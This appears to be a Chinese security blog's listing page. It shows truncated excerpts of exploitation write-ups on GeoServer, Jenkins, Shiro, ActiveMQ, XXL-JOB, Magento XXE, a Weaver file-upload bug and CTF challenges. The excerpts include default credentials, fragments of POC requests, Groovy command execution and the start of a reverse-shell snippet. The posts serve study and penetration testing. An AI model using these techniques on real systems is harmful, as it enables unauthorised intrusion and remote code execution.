CVE-2024-36401 GeoServer RCE实战利用
默认账号密码:admin/geoserver
公开的POC:https://github.com/Mr-xn/CVE-2024-36401
影响版本:GeoServer < 2.23.62.24.0 <= GeoServer < 2.24.42.25.0 <= GeoServer < 2.25.2
注意typeNames必须在系统中存在才能利用访问/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0可以搜索到所有的typeName
GetPropertyValue存在两种传参方式,第一种是xml格式:
123456789101112POST /geoserver/wfs HTTP/1.1Host: 127.0.0.1:8080Content-Type: application/xmlContent-Length: 356<wfs:GetPropertyValue service='WFS' version ...
2025 SUCTF java题复现
青丝白发一瞬间,年华老去向谁言。春风若有怜花意,可否许我再少年?
学习ing
SU_ez_solon先看到pom.xml,主要依赖如下
12345678910111213141516<dependency> <groupId>com.alipay.sofa</groupId> <artifactId>hessian</artifactId> <version>3.5.5</version></dependency><dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.83</version></dependency><dependency> <groupId>com.h2database</gro ...
2025 VNCTF ez_emlog复现
挺有意思的一道题,看了官方wp才发现其实不难,但做的时候完全想不到,很巧妙的漏洞结合
提示:
install.php
mt_rand的安全问题
下载最新版本安装包:https://gitee.com/snowsun/emlog/releases/download/pro-2.5.4/emlog_pro_2.5.4.zip
mt_rand伪随机数在给出第二个提示的时候才反应过来是伪随机数的问题,根据mt_rand定位到include/lib/common.php
1234567891011121314151617function getRandStr($length = 12, $special_chars = true, $numeric_only = false){ if ($numeric_only) { $chars = '0123456789'; } else { $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN ...
Jenkins 弱口令实战利用
通过Jenkins 的弱口令->从而进入控制台RCE->实现内存马
这里环境就使用p神的vulhub了:https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2024-23897
版本:Jenkins Version 2.441管理员用户:admin/vulhub
历史漏洞就没什么好讲的了查看版本信息:http://IP:8080/whoAmI/
也可以从header头x-jenkins中获取版本
后渗透假如有幸进入后台,我们可以在Manage Jenkins -> Script Console执行 Groovy 脚本
Groovy控制台命令执行:
1println "whoami".execute().text
反弹shell,纯依赖Groovy即可:https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76
123456789101112131415161718String host="localhost"; ...
Shiro绕过Header长度限制进阶利用
林花谢了春红,太匆匆。无奈朝来寒雨晚来风。胭脂泪,相留醉,几时重。自是人生长恨水长东。
总结一下技巧吧,师傅们太猛了,浅浅搬个砖
相遇首先看到pen4uin师傅的文章:记一次 Shiro 的实战利用利用到的是文件落地+追加的方式,也是最基础的一种
简单演示一遍首先使用JMG生成Tomcat内存马,输出格式为BASE64
将结果放入[payload]中,限制每组长度为1000
1234567891011121314151617181920212223242526272829303132import javassist.ClassPool;import javassist.CtClass;public class WriteFile { public static void main(String[] args) throws Exception{ String base64 = [payload]; int groupSize = 1000; int length = base64.length(); i ...
ActiveMQ CVE-2023-46604 不出网RCE
最近看到一个不出网的技巧,学习一下
影响版本:
Apache ActiveMQ 5.18.0 before 5.18.3
Apache ActiveMQ 5.17.0 before 5.17.6
Apache ActiveMQ 5.16.0 before 5.16.7
Apache ActiveMQ before 5.15.16
环境搭建:https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2023-46604
默认端口
默认条件
8161 web
需配置才可远程访问
61616 tcp
远程访问
漏洞出现在61616端口中
源码下载:https://www.apache.org/dyn/closer.cgi?filename=/activemq/5.17.3/activemq-parent-5.17.3-source-release.zip&action=download
漏洞触发点在org.apache.activemq.openwire.v12.BaseDataStreamMarshall ...
泛微云桥e-Bridge addResume 任意文件上传漏洞分析
谁翻乐府凄凉曲?风也萧萧,雨也萧萧,瘦尽灯花又一宵。不知何事萦怀抱,醒也无聊,醉也无聊,梦也何曾到谢桥。
环境搭建官方:https://wx.weaver.com.cn/download下载:https://wxdownload.e-cology.com.cn/ebridge/ebridge_install_win64_server2008R2_20200819.zip
根据日志可以下载到 2023-08-21 补丁:https://wxdownload.e-cology.com.cn/ebridge/ebridge_patch_20230821.zip
1、右键点击 install64.bat 以管理员身份运行进行程序安装2、安装完成之后 访问http://服务器IP:80883、登陆系统 sysadmin/1
漏洞分析addResume文件上传看到weaver.weixin.app.recruit.controller.ResumeController#addResume
调用 getWxBaseFile 方法进行文件上传weaver.weixi ...
XXL-JOB Executor 内存马注入
我是清都山水郎。天教分付与疏狂。曾批给雨支风券,累上留云借月章。诗万首,酒千觞。几曾著眼看侯王。玉楼金阙慵归去,且插梅花醉洛阳。
前言在做渗透测试的时候,发现开放了两个端口,一个是404界面
一个显示报错
1{"code":500,"msg":"invalid request, HttpMethod not support."}
经过同事提醒,才发现原来是经典的xxl-job,这个时候可以访问/xxl-job-admin/尝试弱口令登录,也可以尝试未授权或者默认 accessToken 打 Executor 执行器
POC:
12345678910111213141516171819202122232425POST /run HTTP/1.1Host: 127.0.0.1:9999Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...
CVE-2024-34102 Magento XXE 漏洞分析
最近看到一个XXE漏洞,CVSS给了9.8的高分,这就不得不分析一下了:https://github.com/advisories/GHSA-m8cj-3v68-3cxj
影响版本:
1234567= 2.4.4>= 2.4.6-p1, < 2.4.6-p6>= 2.4.5-p1, < 2.4.5-p8< 2.4.4-p9= 2.4.5= 2.4.6= 2.4.7
环境搭建漏洞复现啥的都还好说,环境是真麻烦
推荐使用:https://github.com/markshust/docker-magento/
123456# Create your project directory then go into it:mkdir -p ~/Sites/magentocd $_# Run this automated one-liner from the directory you want to install your project.curl -s https://raw.githubusercontent.com/markshust/docker-mag ...
小程序&APP 渗透测试初探
余操业之时,常有小程序&APP渗透,遂小作一文,以记之
mumu模拟器->永遠の神だ
抓包The source of all things
Method onechose this
root need
Download burp certificate:http://127.0.0.1:8080/cert
Convert certificate to pem format,get md5
12openssl x509 -inform DER -in cacert.der -out cacert.pemopenssl x509 -inform PEM -subject_hash_old -in cacert.pem
Change the certificate filename to 9a5ba575.0
Copy the certificate to /system/etc/security/cacerts/(MT管理器 is a good tool)
Modify permissions
Finally,just add an agent that will do
...